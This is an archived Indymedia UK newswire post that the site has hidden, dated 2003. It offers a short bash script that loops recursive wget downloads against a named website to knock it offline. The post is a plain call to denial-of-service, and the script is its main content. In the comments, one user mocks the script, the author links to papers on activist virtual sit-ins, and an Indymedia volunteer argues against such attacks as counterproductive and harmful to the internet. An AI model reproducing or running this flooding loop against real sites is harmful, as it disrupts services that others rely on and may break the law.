Skip to content or view screen version

Hidden Article

This posting has been hidden because it breaches the Indymedia UK (IMC UK) Editorial Guidelines.

IMC UK is an interactive site offering inclusive participation. All postings to the open publishing newswire are the responsibility of the individual authors and not of IMC UK. Although IMC UK volunteers attempt to ensure accuracy of the newswire, they take no responsibility legal or otherwise for the contents of the open publishing site. Mention of external web sites or services is for information purposes only and constitutes neither an endorsement nor a recommendation.

Bash Script

l4zY | 30.10.2003 21:25 | Anti-racism | Technology | Sheffield

For those with access to bandwidth .. heres a *nix script to whack a web site

#!/bin/bash
while [ "1" -gt "0" ]
do
wget -p -r -l 5 --cache=off --delete-after  http://www.redwatch.org
done

l4zY

l4zY

Comments

Hide the following 3 comments

l4m3

30.10.2003 23:36

this is such a lame script.

h4x0r


Yes .. BUT

31.10.2003 00:44

DOH .. well its not rocket science for sure .. but .. apart from being non news.. whats different from a lame script above to electro hippies

 http://www.fraw.org.uk/ehippies/papers/op1.html

and

the respected cdc
 http://www.fraw.org.uk/ehippies/papers/op1a.html
...

I guess I'll never now ...

l4zY


one is advised against implimenting this

31.10.2003 09:54

Setting up this on a home broadband machince is unwise as it probably break the AUP of your ISP and would only take a complaint from the target who would know your IP to have you loose access. Also they could retaliate in kind. Also unless co-ordinated unlikely to have any effect.

Denial of service attacks are crude, and degrade level of service for internet as a whole.

It is felt that DOS attacks are counter productive as debated in threads on indymedia before.

Indymedia itself has been victim of a DOS attack in the past.

sb - imc